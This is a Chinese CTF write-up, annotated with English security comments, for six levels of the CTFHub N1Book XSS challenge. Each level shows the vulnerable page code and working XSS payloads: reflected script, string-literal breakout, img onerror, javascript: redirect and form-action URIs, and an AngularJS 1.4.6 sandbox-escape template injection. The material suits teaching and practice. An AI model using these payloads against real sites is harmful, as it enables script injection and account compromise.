CTFHub_N1Book-XSS闖關(XSS)
阿新 • • 發佈:2022-04-08
N1Book-第二章Web進階-XSS的魔力-XSS闖關
第一關
簡單的反射xss
前端程式碼
<!-- Level 1: per the writeup this is a simple reflected XSS — the username
     parameter is echoed into this element without HTML-encoding, so the
     mitigation is output encoding (HTML entity escape) at the reflection point.
     NOTE(review): "<div<span>" looks like an extraction artifact for
     "<div><span>" — confirm against the original page. -->
<div<span>welcome xss</span></div>
payload
/level1?username=xss<script>alert(1)</script> /level1?username=xss%3Csvg/onload=alert()
第二關
輸出點在 script 標籤內的字串字面量中，閉合好該字串與語句即可
前端程式碼
<!-- Level 2: the username value is inlined into a JavaScript string literal,
     so the vulnerable sink is the script context — not the later innerHTML
     write, which is escape()d. -->
<script type="text/javascript">
    // Default the query string so the page always has a username to render.
    if(location.search== ""){
        location.search = "?username=xss"
    }
    // Server-side injection point (inferred from the writeup's payload): a
    // single quote in the username closes this literal and the remainder is
    // parsed as code. Mitigation: JS-encode the value (e.g. JSON-encode and
    // escape "</" ) before embedding it in a script block.
    var username = 'undefined';
    // escape() protects only this DOM write; it does nothing for the
    // string-literal context above.
    document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
</script>
payload
/level2?username=xss';alert(1);//
第三關
DOM XSS：使用者輸入將被 JS 動態地寫入 HTML 中
前端程式碼
<!-- Level 3: described in the writeup as DOM XSS (user input written into the
     HTML by script). NOTE(review): the listing shown here is identical to
     level 2 apart from the literal 'xss', and the innerHTML write is escape()d,
     so the DOM-side write the payload reaches is presumably elsewhere in the
     real page — confirm against the live challenge. -->
<script type="text/javascript">
    // Default the query string so the page always has a username to render.
    if(location.search == ""){
        location.search = "?username=xss"
    }
    // Server-rendered value; with a quote in the input this is the same
    // script-context injection point as level 2.
    var username = 'xss';
    // Mitigation for any innerHTML write of user data: use textContent, or
    // HTML-encode rather than escape(), which is URL-style encoding.
    document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
</script>
payload
/level3?username=xss<img src=x onerror=alert``> /level3?username=xss<img src=x onerror=alert(1)/>
第四關
JS 跳轉帶來的 XSS：跳轉目標可控，可導向偽協議
前端程式碼
<!-- Level 4: jumpUrl is read from the query string and, after a countdown,
     assigned to location.href — the navigation target (including its URL
     scheme) is attacker-controlled. -->
<script type="text/javascript">
    var time = 10;
    var jumpUrl;
    // Falls back to the current page when the parameter is absent. Note the
    // loose "== false" comparison: an empty value ('') also takes this branch.
    if(getQueryVariable('jumpUrl') == false){
        jumpUrl = location.href;
    }else{
        jumpUrl = getQueryVariable('jumpUrl');
    }
    setTimeout(jump,1000,time);
    // One-second countdown; redirects once it reaches zero.
    function jump(time){
        if(time == 0){
            // Sink: location.href accepts any URL scheme, not only http(s).
            // Mitigation: parse with new URL(jumpUrl, location.href) and
            // allow-list http/https (or same-origin paths) before assigning.
            location.href = jumpUrl;
        }else{
            time = time - 1 ;
            // The countdown text is escape()d, so this write is not the sink here.
            document.getElementById('ccc').innerHTML= `頁面${time}秒後將會重定向到${escape(jumpUrl)}`;
            setTimeout(jump,1000,time);
        }
    }
    // Returns the raw (not URL-decoded) value of the first matching query
    // parameter, or false when it is absent; the key match uses loose ==.
    function getQueryVariable(variable) {
        var query = window.location.search.substring(1);
        var vars = query.split("&");
        for (var i=0;i<vars.length;i++) {
            var pair = vars[i].split("=");
            if(pair[0] == variable){return pair[1];}
        }
        return(false);
    }
</script>
payload
/level4?jumpUrl=javascript:alert()
第五關
表單自動提交且 action 可控：可將表單提交到偽協議的地址
前端程式碼
<!-- Level 5: the form's action attribute is taken from the query string and
     the form is then submitted automatically, so the submission target
     (including its URL scheme) is attacker-controlled. -->
<script type="text/javascript">
    // Strict "!== false" here vs. loose "== false" below: any present
    // autosubmit value, even an empty one, enters this branch.
    if(getQueryVariable('autosubmit') !== false){
        var autoForm = document.getElementById('autoForm');
        // Sink: form.action accepts a user-supplied URL of any scheme.
        // Mitigation: keep the action a fixed server-side value, or allow-list
        // same-origin http(s) targets before assigning it.
        autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');
        autoForm.submit();
    }else{
    }
    // Returns the raw (not URL-decoded) value of the first matching query
    // parameter, or false when it is absent; the key match uses loose ==.
    function getQueryVariable(variable) {
        var query = window.location.search.substring(1);
        var vars = query.split("&");
        for (var i=0;i<vars.length;i++) {
            var pair = vars[i].split("=");
            if(pair[0] == variable){return pair[1];}
        }
        return(false);
    }
</script>
payload
/level5?action=javascript:alert()&autosubmit=1
第六關
Angular.js 二次渲染導致的 XSS（使用者輸入被當作 Angular 模板再次解析）
前端程式碼
<!-- Level 6: AngularJS 1.4.6 is bootstrapped on #root via ng-app="", so any
     text Angular finds inside that element is compiled as a template
     (client-side template injection). Per the writeup the username value ends
     up inside this scope — presumably in the "welcome xss" span; the
     server-side substitution is not visible in this static listing.
     Mitigation: never place user-controlled text inside an ng-app scope (or
     mark that element ng-non-bindable), and keep the framework current. -->
<html lang="zh"><head>
    <meta charset="UTF-8">
    <title>XSS配套測試平臺</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <link rel="stylesheet" href="https://houtai.baidu.com/v2/csssdk">
    <script type="text/javascript" src="main.js"></script>
    <!-- Third-party script loaded from a CDN with no integrity attribute;
         add Subresource Integrity (integrity + crossorigin) so a CDN
         compromise cannot substitute the framework. -->
    <script src="https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js"></script>
    <style>
        html, body, .app-wrapper { position: relative; width: 100%; height: 100%; margin: 0; padding: 0; }
    </style>
</head>
<body>
    <!-- Everything below this ng-app root is subject to Angular's template
         compilation, including server-rendered text. -->
    <div id="root" class="app-wrapper amis-scope" ng-app=""><div class="amis-routes-wrapper"><div class="a-Toast-wrap a-Toast-wrap--topRight"></div><div class="a-Page"><div class="a-Page-content"><div class="a-Page-main"><div class="a-Page-header"><h2 class="a-Page-title"><span class="a-TplField">XSS test platform</span></h2></div><div class="a-Page-body"><span class="a-TplField">welcome xss</span></div></div></div></div></div></div>
    <script type="text/javascript">
        // Default the query string so the page always has a username to render.
        if(location.search == ""){
            location.search = "?username=xss"
        }
    </script>
</body></html>
payload
/level6?username={{%27a%27.constructor.prototype.charAt=[].join;$eval(%27x=1} } };alert(1)//%27);}}
最終拿到flag